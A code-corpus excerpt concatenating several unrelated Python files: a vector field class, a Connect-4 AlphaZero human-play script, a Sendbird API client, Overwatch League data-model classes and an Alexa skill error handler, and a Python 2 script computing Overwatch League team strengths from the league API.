elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val /= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val /= x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val /= x
return self
def __add__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__add__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)+x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val+x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val+res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__radd__ = __add__
def __iadd__(self,x): ## __iadd__ : self += x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val += x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val += x.val.astype(self.domain.datatype)
elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val += x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val += x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val += x
return self
def __sub__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__sub__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)-x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val-x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val-res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
def __rsub__(self,x):
return(-(self.__sub__(x)))
def __isub__(self,x): ## __isub__ : self -= x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val -= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val -= x.val.astype(self.domain.datatype)
elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val -= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val -= x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val -= x
return self
def __pow__(self,x):
res = super(vector_field,self).__pow__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
def __rpow__(self,x):
res = super(vector_field,self).__rpow__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
def plot(self,**kwargs):
if("title" in kwargs):
title = kwargs.__getitem__("title") + " -- "
kwargs.__delitem__("title")
else:
title = ""
for ii in range(self.Ndim()):
field(self.domain.nest[1],target=self.target.nest[1],val=self.val[ii]).plot(title=title+"component {}".format(ii),**kwargs)
def Ndim(self):
return self.domain.nest[0].para[0]
def component(self,jjj):
try:
jj = int(jjj)
except:
raise TypeError("ERROR: invalid input.")
if((jj<0) or (jj>(self.Ndim()-1))):
raise ValueError("ERROR: index needs to be between 0 and {}".format(self.Ndim()-1))
return field(self.domain.nest[1],target=self.target.nest[1],val=self.val[jj])
class position_field(vector_field):
def __init__(self,domain,target=None,**kwargs):
## check domain
if(not isinstance(domain,space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
self.domain = nested_space([point_space(domain.naxes()),domain])
## check codomain
if(target is None):
target = domain.get_codomain()
else:
domain.check_codomain(target)
self.target = nested_space([self.domain.nest[0],target])
ndim = domain.para[:domain.naxes()]
temp_vecs = np.array(np.where(np.ones(ndim))).reshape(np.append(domain.naxes(),ndim))
corr_vecs = domain.zerocenter()*ndim/2
self.val = np.array([domain.vol[ii]*(temp_vecs[ii]-corr_vecs[ii]) for ii in range(len(domain.vol))])
self.val = self.val[: :-1]
``` |
{
"source": "jpbruneton/Alpha-Zero-algorithm-for-Connect-4-game",
"score": 2
} |
#### File: jpbruneton/Alpha-Zero-algorithm-for-Connect-4-game/play_against_human.py
```python
from MCTS_NN import Node, MCTS_NN
from Game_bitboard import Game
import numpy as np
from ResNet import ResNet
import ResNet
import time
import torch.utils
def onevsonehuman(budget, whostarts):
if whostarts == 'computer':
modulo = 1
else:
modulo = 0
file_path_resnet = './best_model_resnet.pth'
best_player_so_far = ResNet.resnet18()
best_player_so_far.load_state_dict(torch.load(file_path_resnet))
game = Game()
tree = MCTS_NN(best_player_so_far, use_dirichlet=False)
rootnode = tree.createNode(game.state)
currentnode = rootnode
turn = 0
isterminal = 0
while isterminal == 0:
turn = turn + 1
if turn % 2 == modulo:
player = 'computer'
sim_number = budget
else:
player = 'human'
if player=='computer':
print('===============IA playing================')
for sims in range(0, sim_number):
tree.simulate(currentnode, cpuct=1)
treefordisplay = MCTS_NN(best_player_so_far, False)
rootnodedisplay = treefordisplay.createNode(game.state)
treefordisplay.expand_all(rootnodedisplay)
tree.eval_leaf(rootnodedisplay)
pchild = rootnodedisplay.proba_children
pchild = [int(1000 * x) / 10 for x in pchild]
for child in rootnodedisplay.children:
treefordisplay.eval_leaf(child)
Qs = [int(100 * child.Q) / 100 for child in rootnodedisplay.children]
print('NN thoughts', pchild, Qs)
visits_after_all_simulations = []
for child in currentnode.children:
visits_after_all_simulations.append(child.N)
print('result visits', visits_after_all_simulations)
time.sleep(0.5)
values = np.asarray(visits_after_all_simulations)
imax = np.random.choice(np.where(values == np.max(values))[0])
print('choice made', imax)
currentnode = currentnode.children[imax]
else: #human player
print('=============== your turn =====================')
game=Game(currentnode.state)
game.display_it()
moves=game.allowed_moves()
print('chose a move from 0 to 6 -- beware of full columns! (not taken into account : e.g. if column three is full, enter 5 instead of 6 to play in the last column)')
human_choice=int(input())
game.takestep(moves[human_choice])
currentnode=Node(game.state, moves[human_choice])
# reinit tree
game = Game(currentnode.state)
tree = MCTS_NN(best_player_so_far, use_dirichlet=False)
rootnode = tree.createNode(game.state)
currentnode = rootnode
isterminal = currentnode.isterminal()
game = Game(currentnode.state)
gameover, winner = game.gameover()
#print('end of game')
if winner == 0:
toreturn = 'draw'
print('draw')
elif winner == 1:
if whostarts == 'computer':
print('computer wins')
toreturn = 'budget1'
else:
print('you win')
toreturn = 'budget2'
elif winner == -1:
if whostarts == 'computer':
print(' you win')
toreturn = 'budget2'
else:
print('computer wins')
toreturn = 'budget1'
return toreturn
#set the number of sims the NN player gets:
sim_number = 200
# set who starts, 'human' or 'computer'
onevsonehuman(200, 'human')
``` |
{
"source": "jpbullalayao/sendbird-python",
"score": 3
} |
#### File: api_resources/abstract/api_resource.py
```python
import abc
import sendbird
from sendbird import http_methods
from sendbird.api_requestor import APIRequestor
from sendbird.sendbird_object import SendbirdObject
from sendbird.util import convert_to_sendbird_object
class APIResource(SendbirdObject):
@classmethod
def retrieve(cls, pk, api_token=None, **params):
requestor = APIRequestor(
api_token
)
instance = cls(pk, api_token, **params)
instance.refresh(requestor)
return instance
def refresh(self, requestor):
response = requestor.request(http_methods.HTTP_METHOD_GET, self.instance_url())
sendbird_object = convert_to_sendbird_object(response, self.__class__)
self.refresh_from(sendbird_object)
return self
@classmethod
def class_url(cls):
if cls == APIResource:
raise NotImplementedError(
"APIResource is an abstract class. You should perform "
"actions on its subclasses (e.g. Message)"
)
return "{resource_name}s".format(
resource_name=cls.RESOURCE_NAME
)
@abc.abstractmethod
def instance_url(self):
raise NotImplementedError
@classmethod
def static_request(cls, method, url, api_token=None, params=None, headers=None):
requestor = APIRequestor(
api_token or sendbird.api_token
)
response = requestor.request(method, url, params)
sendbird_object = convert_to_sendbird_object(response, cls)
return sendbird_object
def request(self, method, url, params=None, headers=None):
requestor = APIRequestor(
self.api_token,
)
response = requestor.request(method, url, params)
sendbird_object = convert_to_sendbird_object(response, self.__class__)
return sendbird_object
```
#### File: sendbird/api_resources/group_channel.py
```python
from sendbird import api_endpoints
from sendbird import http_methods
from sendbird.api_resources.channel import Channel
class GroupChannel(Channel):
RESOURCE_NAME = "group_channel"
def list_members(self):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_LIST_MEMBERS
return self.request(http_methods.HTTP_METHOD_GET, url)
def check_if_member(self, **params):
user_id = params.get("user_id")
formatted_endpoint = api_endpoints.GROUP_CHANNEL_CHECK_IF_MEMBER.format(
user_id=user_id
)
url = self.instance_url() + formatted_endpoint
return self.request(http_methods.HTTP_METHOD_GET, url, params=params).is_member
def accept_invitation(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_ACCEPT_INVITATION
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def reject_invitation(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_REJECT_INVITATION
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def join(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_JOIN
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def leave(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_LEAVE
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def hide(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_HIDE
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def unhide(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_UNHIDE
return self.request(http_methods.HTTP_METHOD_DELETE, url, params=params)
def reset_chat_history(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_RESET_CHAT_HISTORY
return self.request(http_methods.HTTP_METHOD_PUT, url, params=params)
def invite_users(self, **params):
url = self.instance_url() + api_endpoints.GROUP_CHANNEL_INVITE_USERS
return self.request(http_methods.HTTP_METHOD_POST, url, params=params)
``` |
{
"source": "jpburnett/overwatch-league-skill",
"score": 3
} |
#### File: py/owl_model/easteregg.py
```python
from owl_model.modelobject import ModelObject
class EasterEgg(ModelObject):
"""
The Easter Egg in the API
"""
cls_attr_types = {
'theWorld': 'str'
}
cls_attr_map = {
'theWorld': 'the world'
}
def __init__ (self, theWorld=None):
"""
API request at the default endpoint
"""
self.theWorld = theWorld
```
#### File: py/owl_model/game.py
```python
from owl_model.modelobject import ModelObject
class Game(ModelObject):
"""
An OWL game
A match in OWL is a best-of-X competition where two teams play X games and
the winner of the match is considered to be the team winning the majority of
the games.
"""
cls_attr_types = {
'id': 'str',
'map': 'owl_model.map.Map',
'vod': 'owl_model.url.Vod',
'players': 'list[owl_model.player.Player]',
'state': 'str',
'status': 'str',
#stats : TODO: watch this field closely, this seems new.
'matchid': 'dict(str, str)'
}
cls_attr_map = {
'id': 'id',
'map': 'attributes',
'vod': 'vodLink',
'players': 'players',
'state': 'state',
'status': 'status',
#'stats': 'stats',
'matchid': 'match'
}
def __init__ (self, id=None, map=None, vod=None, players=None,
state=None, status=None, matchid=None):
"""
"""
self.id = id
self.map = map
self.vod = vod
self.players = players
self.state = state
self.status = status
self.matchid = matchid
def finalize_init (self):
"""
"""
self.matchid = self.matchid['id']
```
#### File: py/owl_model/league.py
```python
from owl_model.modelobject import ModelObject
# TODO: Noted previously, the League was made after a decision to seperate the
# TeamsRequest (APIRequest) class from the model objects with information. The
# problem was that the APIRequest was returning a TeamsRequest object which
# would have all the APIRequest/URL methods which overwhelms the class and is
# really not necessariy. This is one approach
# However, another approach would be to better write the TeamsRequest (and other
# inherited APIRequest classes) to return objects in the model. For example, the
# TeamsRequest instead would parse the data and return a list of teams (e.g.,
# list[owl_model.team.Team] and other model objects.
class League(ModelObject):
"""
Collection of all OWL Teams
"""
# TODO: build a way to alias team names. Currently the team model has a
# shortname attribute that is a 3 letter initial but sometimes we may like
# to refer to the teams by spoken shorthand name e.g., Fuel, Fusion,
# Uprising, etc (or at least we did before hand).
teams_id_map = {
'4523': '<NAME>',
'4524': 'Philadelphia Fusion',
'4525': 'Houston Outlaws',
'4402': 'Boston Uprising',
'4403': 'New York Excelsior',
'4404': 'San Francisco Shock',
'4405': 'Los Angeles Valiant',
'4406': 'Los Angeles Gladiators',
'4407': 'Florida Mayhem',
'4408': 'Shanghai Dragons',
'4409': 'Seoul Dynasty',
'4410': 'London Spitfire',
'7692': 'Chengdu Hunters',
'7693': 'Hangzhou Spark',
'7694': 'Paris Eternal',
'7695': 'Toronto Defiant',
'7696': 'Vancouver Titans',
'7697': 'Washington Justice',
'7698': 'Atlanta Reign',
'7699': 'Guangzhou Charge'
}
cls_attr_types = {
# This was the implementation before addint the bootstrap_subclass
# method and was changed and now is commented out becasue it felt
# awkward compared to the rest of the model interfaces.
# For example to access the teams it would be
# league = sd.deserialize(r.content, TeamRequest)
# ...
# league.leagueteams[0]['competitor'] -> this is a owl_model.team.Team
#'leagueteams': 'list[dict(str, owl_model.team.Team)]',
'teams': 'list[owl_model.team.Team]',
'divisions': 'list[owl_model.team.Division]',
'logo': 'owl_model.url.Logo'
}
cls_attr_map = {
'teams': 'competitors',
'divisions': 'owl_divisions',
'logo': 'logo'
}
@classmethod
def bootstrap_subclass(cls, data):
"""
The /teams request endpoint has the usually 'competitors' key indicating
participating teams. However, the list contains another object before
matching the structure of an owl_model.team.Team because there are two
other keys. One being the 'division' key which is the same for all teams
with this call. It looks like this is a division identifying the team as
belonging to the game Overwatch and not a division within Overwatch.
So as to make this 'competitors' list look like a team we have to modify
list.
"""
teams = []
for team in data['competitors']:
teams.append(team['competitor'])
data['competitors'] = teams
return data
def __init__ (self, teams=None, divisions=None):
"""
"""
self.teams = teams
self.divisions = divisions
```
#### File: py/owl_model/map.py
```python
from owl_model.modelobject import ModelObject
class Map(ModelObject):
"""
An OWL map
A map in Overwatch in many ways is synonymous with the term "game" because
playing map comes with different objective goals. There are 4 different map
types that determine the objective for victory.
"""
cls_attr_types = {
'name': 'str',
'id': 'str',
'type': 'str'
}
cls_attr_map = {
'name': 'map',
'id': 'mapGuid',
'type': 'type'
}
map_type_discriminator = {
'junkertown': 'escort',
'dorado': 'escort',
'route-66': 'escort',
'gibraltar': 'escort',
'rialto': 'escort',
'havana': 'escort',
'hanamura': 'assault',
'volskaya': 'assault',
'temple-of-anubis': 'assault',
'horizon-lunar-colony': 'assault',
'paris': 'assault',
'kings-row': 'hybrid',
'numbani': 'hybrid',
'hollywood': 'hybrid',
'eichenwalde': 'hybrid',
'blizzard-world': 'hybrid',
'nepal': 'control',
'ilios': 'control',
'lijiang-tower': 'control',
'oasis': 'control',
'busan': 'control',
}
def __init__ (self, id=None, name=None, type=None):
"""
"""
self.id = id
self.name = name
self.type = type
def finalize_init (self):
"""
"""
if self.name is not None:
self.type = self.map_type_discriminator[self.name]
```
#### File: py/owl_model/match.py
```python
from owl_model.modelobject import ModelObject
class Match(ModelObject):
"""
An OWL match
"""
cls_attr_types = {
'id': 'str',
'teams': 'list[owl_model.team.Team]',
'games': 'list[owl_model.game.Game]',
'startdate': 'datetime',
'enddate': 'datetime',
'startTS': 'datetime',
'endTS': 'datetime',
'timezone': 'str'
}
cls_attr_map = {
'id': 'id',
'teams': 'competitors',
'games': 'games',
'startdate': 'startDate',
'enddate': 'endDate',
'startTS': 'startDateTS',
'endTS': 'endDateTS',
'timezone': 'timeZone'
}
def __init__ (self, id=None, teams=None, games=None, startdate=None,
enddate=None, startTS=None, endTS=None, timezone=None):
"""
"""
self.id = id
self.teams = teams
self.games = games
self.startdate = startdate
self.enddate = enddate
self.startTS = startTS
self.endTS = endTS
self.timezone = timezone
```
#### File: py/owl_model/team.py
```python
from owl_model.modelobject import ModelObject
class Team(ModelObject):
"""
An OWL team
"""
# TODO: This approach seems to be working although sometimes unexpected
# behavior happens when passing primitive types. For example, I think I
# passed in 'string' instead of 'str' as a test and that wrong builtin type
# did not phase anything. I got the right answer but that was unexpected.
# This makes mer think the __deserialize method, while it does work, may be
# more complicated than it may need be. The todo here is to investigate this
cls_attr_types = {
'id': 'str',
'name': 'str',
'players': 'list[owl_model.player.Player]',
'schedule': 'list[owl_model.match.Match]',
'ranking': 'dict(str, str)',
'division': 'str',
'hometown': 'str',
'country': 'str',
'shortname': 'str',
'logo': 'owl_model.url.Logo',
'logolrg': 'owl_model.url.Logo',
'icon': 'owl_model.url.Icon',
'colorA': 'str',
'colorB': 'str'
}
cls_attr_map = {
'id': 'id',
'name': 'name',
'players': 'players',
'schedule': 'schedule',
'ranking': 'ranking',
'division': 'owl_division',
'hometown': 'homeLocation',
'country': 'addressCountry',
'shortname': 'abbreviatedName',
'logo': 'logo',
'logolrg': 'secondaryPhoto',
'icon': 'icon',
'colorA': 'primaryColor',
'colorB': 'secondaryColor'
}
@classmethod
def bootstrap_subclass(cls, data):
"""
As written now the owl_model expects a list[owl_model.player.Players]
and each owl_model.player.Player has a owl_model.player.PlayerInfo
attribute.
Requests to the OWL API with Team information is inconsistent in the way
returns Team information. It does not always match this assumption
(e.g., the /teams endpoint and 'players' are not even present in
/match/id request).
This bootstraps the team component to match the owl_model expectation.
"""
# accomodate the v2 endpoint
if 'data' in data:
data = data['data']
# handle when no players are present in team info
if not 'players' in data:
return data
# require that players match owl_model.player.Player
players = []
for player in data['players']:
if 'team' in player.keys():
# already matches expected PlayerInfo structure
d = player
else:
# need to set up the structure
d = {
'team': {'id': data['id'], 'type':'TEAM'},
'player': player,
'flags':[]
}
players.append(d)
data['players'] = players
return data
def __init__ (self, id=None, name=None, players=None, division=None,
schedule=None, ranking=None, hometown=None, country=None,
shortname=None, logo=None, logolrg=None, icon=None,
colorA=None, colorB=None):
self.id = id
self.name = name
self.players = players
self.schedule = schedule
self.ranking = ranking
self.division = division
self.hometown = hometown
self.country = country
self.shortname = shortname
self.logo = logo
self.logolrg = logolrg
self.icon = icon
self.colorA = colorA
self.colorB = colorB
class Division(ModelObject):
"""
A division is a logical group of teams that compete against eachother in the
standings for an oppertunity at the playoffs.
Right now the league consists of two major divisions (Atlantic and Pacific)
and no subdivisions within these divisions.
"""
cls_attr_types = {
'id': 'str',
'name': 'str',
'shortname': 'str'
}
cls_attr_map = {
'id': 'id',
'name': 'name',
'shortname': 'abbrev'
}
def __init__ (self, id=None, name=None, shortname=None):
"""
"""
self.id = id
self.name = name
self.shortname = shortname
```
#### File: py/owl_skill/exception_handlers.py
```python
from ask_sdk_core.dispatch_components import AbstractExceptionHandler
from ask_sdk_core.handler_input import HandlerInput
# import resources for the audio lines
from utils import resources as resource
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class CatchAllExceptionHandler(AbstractExceptionHandler):
"""Catch all exception handler, log exception and
respond with custom message.
"""
def can_handle(self, handler_input, exception):
# type: (HandlerInput, Exception) -> bool
return True
def handle(self, handler_input, exception):
# type: (HandlerInput, Exception) -> Response
logger.error(exception, exc_info=True)
speech = "Sorry, there was some problem. Please try again!!"
ssmlSpeech = '<audio src=\"' + resource.AUDIO['errorSounds']['mei'] + '"\/> ' + speech
handler_input.response_builder.speak(ssmlSpeech).ask(ssmlSpeech)
return handler_input.response_builder.response
```
#### File: overwatch-league-skill/OWLMonteCarlo/owl_game_sim.py
```python
import os, sys, json, requests
import datetime as dt
import time
import numpy as np
from scipy.stats import poisson
import matplotlib.pyplot as plt
# NOTE: TEAM1 = AWAY TEAM (ATK FIRST)
# TEAM2 = HOME TEAM (DEF FIRST)
SOURCE = "NETWORK"
ESCORT = ['junkertown', 'dorado', 'route-66', 'gibraltar']
ASSAULT = ['hanamura', 'volskaya', 'temple-of-anubis', 'horizon-lunar-colony']
HYBRID = ['kings-row', 'numbani', 'hollywood', 'eichenwalde', 'blizzard-world']
CONTROL = ['nepal', 'ilios', 'lijiang', 'oasis']
TEAM_ID = {
'4523' : 'fuel',
'4524' : 'fusion',
'4525' : 'outlaws',
'4402' : 'uprising',
'4403' : 'excelsior',
'4404' : 'shock',
'4405' : 'valiant',
'4406' : 'gladiators',
'4407' : 'mayhem',
'4408' : 'dragons',
'4409' : 'dynasty',
'4410' : 'spitfire'
}
class dataManager:
def __init__(self, root=None, src=SOURCE, ext='.json'):
self.root = root
self.src = src
self.ext = ext
def fetchData(self, route):
url = os.path.join(self.root, route)
if self.src == "NETWORK":
# fetch from network url and json decode
r = requests.get(url).json()
else:
# open json file
fp = open(url+self.ext, 'r')
r = json.load(fp)
return r
class WL_hist:
def __init__(self, min, max):
self.homePts = simple_hist(min, max)
self.awayPts = simple_hist(min, max)
def binHomePts(self, val):
self.homePts.bin(val)
def binAwayPts(self, val):
self.awayPts.bin(val)
class simple_hist:
def __init__(self, min, max):
self.min = min
self.max = max
self.bins = np.zeros(int(max - min))
def bin(self, value):
self.bins[value] += 1
class league:
def __init__(self):
self.teams = []
def addTeam(self, team):
self.teams.append(team)
def getTeam(self, id):
if len(self.teams) == 0:
return None
for i in range(0, len(self.teams)):
t = self.teams[i]
if t.id == id:
return t
print "Team not found..."
return None
def printOverallStandings(self):
print '{:<6s}{:<24s} W-L MAP W-L-T'.format("ID", "Name")
print "--------------------------------------------------"
for t in self.teams:
print '{:<6d}{:<24s} {:2d}-{:<2d} {:2d}-{:2d}-{:<2d}'.format(t.id, t.name, t.W, t.L, t.wins, t.loss,
t.tie)
print "--------------------------------------------------"
print '{:<6s}{:<24s} MAP {:<3d}-{:<3d}-{:2d}'.format("####", "League Totals", totalPtsWin, totalPtsLoss,
totalPtsTie)
print ""
class team:
def __init__(self, obj):
self.name = obj['competitor']['name']
self.id = obj['competitor']['id']
self.place = obj['placement']
record = obj['records'][0]
self.wins = record['gameWin']
self.loss = record['gameLoss']
self.tie = record['gameTie']
self.W = record['matchWin']
self.L = record['matchLoss']
self.simResults = {
"wins" : 0,
"loss" : 0,
"tie" : 0,
"W" : 0,
"L" : 0
}
self. matchesPlayed = 0
self.streak = 0
self.escortPts = 0
self.escortPtsLost = 0
self.escortPlayed = 0
self.hybridPts = 0
self.hybridPtsLost = 0
self.hybridPlayed = 0
self.controlPts = 0
self.controlPtsLost = 0
self.controlPlayed = 0
self.assaultPts = 0
self.assaultPtsLost = 0
self.assaultPlayed = 0
self.escortAtk = 0
self.escortDef = 0
self.hybridAtk = 0
self.hybridDef = 0
self.controlAtk = 0
self.controlDef = 0
self.assaultAtk = 0
self.assaultDef = 0
league = league()
totalPtsWin = 0
totalPtsLoss = 0
totalPtsTie = 0
totalHomePts = 0
totalAwayPts = 0
team1Matches = 0 # team1 matches == team2 matches == matches played (hopefully) maybe matches concluded?
team2Matches = 0
totalEscortPts = 0
totalEscortPlayed = 0
totalAssaultPts = 0
totalAssaultPlayed = 0
totalHybridPts = 0
totalHybridPlayed = 0
totalControlPts = 0
totalControlPlayed = 0
matchesConcluded = 0
matchesPlayed = 0 # there is a discrepancy between matches played and matches concluded because of season stage finals and preseason
escort_hist = WL_hist(0,10)
hybrid_hist = WL_hist(0,10)
control_hist = WL_hist(0,3)
assault_hist = WL_hist(0,10)
# escort_hist = simple_hist(0,10)
# hybrid_hist = simple_hist(0,10)
# control_hist = simple_hist(0,4)
# assault_hist = simple_hist(0,10)
# initialize the data source information
if SOURCE == "NETWORK":
rootURL = 'https://api.overwatchleague.com'
else:
rootURL = './data'
dm = dataManager(rootURL)
# Get team standings and initialize league
response = dm.fetchData('standings')
ranks = response['ranks']
for rank in ranks:
t = team(rank)
league.addTeam(t)
totalPtsWin += t.wins
totalPtsLoss += t.loss
totalPtsTie += t.tie
league.printOverallStandings()
# get the number of matches played... figured it was better to get it from the API
response = dm.fetchData('ranking')
matchesConcluded = response['matchesConcluded'] # matches concluded form the API is diff than the count because it doesn't include playoff games
totalMatchCount = 0
# Now get all the matches played by the team and fill in their map type scores
now = int(time.time()*1000)
response = dm.fetchData('schedule')
stages = response['data']['stages']
startStgIdx = 1
stageEndIdx = 5 # preseason is id 0
for s in stages[startStgIdx:stageEndIdx]:
print 'Processing matches for stage {:d}...'.format(s['id'])
matches = s['matches']
matches = sorted(matches, key=lambda x: x['startDateTS'])
for m in matches:
if m['state'] == "CONCLUDED":
#if now > m['startDateTS']:
totalMatchCount += 1
totalAwayPts += m['scores'][0]['value']
totalHomePts += m['scores'][1]['value']
t1 = league.getTeam(m['competitors'][0]['id']) # away
t2 = league.getTeam(m['competitors'][1]['id']) # home
t1.matchesPlayed += 1
t2.matchesPlayed += 1
games = m['games']
for g in games:
if g['state'] == "CONCLUDED":
gAttrs = g['attributes']
mapType = gAttrs['map']
if mapType in ESCORT:
t1.escortPts += gAttrs['mapScore']['team1']
t1.escortPtsLost += gAttrs['mapScore']['team2']
t2.escortPtsLost += gAttrs['mapScore']['team1']
t2.escortPts += gAttrs['mapScore']['team2']
t1.escortPlayed += 1
t2.escortPlayed += 1
totalEscortPlayed += 1
# bin the points scored by the teams to visualize probability of scoring
# pts on a certain map type. I am a little conflicted about this because of
# league game format. The home team defends first and in OW for escort,
# assault and hybrid maps the home team only need to score one better
# than the away teams attack attempt. So maybe the atk/def strength can
# take this into account but I can imagine a better model being "generate
# the away teams atk score given an opponets defense strength then calculate
# the probability the home team scores that number of points or greater given their
# attack strength and away teams defense strength."
escort_hist.binAwayPts(gAttrs['mapScore']['team1'])
escort_hist.binHomePts(gAttrs['mapScore']['team2'])
if mapType in ASSAULT:
t1.assaultPts += gAttrs['mapScore']['team1']
t1.assaultPtsLost += gAttrs['mapScore']['team2']
t2.assaultPtsLost += gAttrs['mapScore']['team1']
t2.assaultPts += gAttrs['mapScore']['team2']
t1.assaultPlayed += 1
t2.assaultPlayed += 1
totalAssaultPlayed += 1
assault_hist.binAwayPts(gAttrs['mapScore']['team1'])
assault_hist.binHomePts(gAttrs['mapScore']['team2'])
if mapType in HYBRID:
t1.hybridPts += gAttrs['mapScore']['team1']
t1.hybridPtsLost += gAttrs['mapScore']['team2']
t2.hybridPtsLost += gAttrs['mapScore']['team1']
t2.hybridPts += gAttrs['mapScore']['team2']
t1.hybridPlayed += 1
t2.hybridPlayed += 1
totalHybridPlayed += 1
hybrid_hist.binAwayPts(gAttrs['mapScore']['team1'])
hybrid_hist.binHomePts(gAttrs['mapScore']['team2'])
if mapType in CONTROL:
t1.controlPts += gAttrs['mapScore']['team1']
t1.controlPtsLost += gAttrs['mapScore']['team2']
t2.controlPtsLost += gAttrs['mapScore']['team1']
t2.controlPts += gAttrs['mapScore']['team2']
t1.controlPlayed += 1
t2.controlPlayed += 1
totalControlPlayed += 1
control_hist.binAwayPts(gAttrs['mapScore']['team1'])
control_hist.binHomePts(gAttrs['mapScore']['team2'])
# Print total points scored by team and the league
print '{:<24s}{:<14s}{:<14s}{:<14s}{:<14s}'.format("Name", "Escort W-L", "Assault W-L", "Hybrid W-L", "Control W-L")
print "---------------------------------------------------------------------------"
for t in league.teams:
print '{:<24s}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}'.format(t.name, t.escortPts, t.escortPtsLost, t.assaultPts, t.assaultPtsLost, t.hybridPts, t.hybridPtsLost, t.controlPts, t.controlPtsLost)
totalEscortPts += t.escortPts
totalAssaultPts += t.assaultPts
totalHybridPts += t.hybridPts
totalControlPts += t.controlPts
print "---------------------------------------------------------------------------"
print '{:<24s}{:<16d}{:<16d}{:<16d}{:<16d}'.format("League Totals", totalEscortPts, totalAssaultPts, totalHybridPts, totalControlPts)
# Calculate strengths
leagueMatchAtkRatio = float(totalAwayPts)/float(totalMatchCount) # maybe could call Away strength? A metric to help weight prob of an away team winning?
leagueMatchDefRatio = float(totalHomePts)/float(totalMatchCount) # maybe could call Home strength? A metric to help weight prob of a home team stopping the away team?
leagueEscortRatio = float(totalEscortPts)/float(totalEscortPlayed)
leagueAssaultRatio = float(totalAssaultPts)/float(totalAssaultPlayed)
leagueHybridRatio = float(totalHybridPts)/float(totalHybridPlayed)
leagueControlRatio = float(totalControlPts)/float(totalControlPlayed)
print "league match atk ratio ", leagueMatchAtkRatio
print "league match def ratio ", leagueMatchDefRatio
print "total escort pts", totalEscortPts
print "total escort played", totalEscortPlayed
print leagueEscortRatio
print
print "total control pts", totalControlPts
print "total control played", totalControlPlayed
print leagueControlRatio
print ""
print "{:<24s}{:<20s}{:<20s}{:<20s}{:<20s}".format("Name", "Escort Atk-Def", "Assault Atk-Def", "Hybrid Atk-Def", "Control Atk-Def")
print "----------------------------------------------------------------------------------------------"
for t in league.teams:
t.escortAtk = (float(t.escortPts)/float(t.escortPlayed))/leagueEscortRatio
t.escortDef = (float(t.escortPtsLost)/float(t.escortPlayed))/leagueEscortRatio
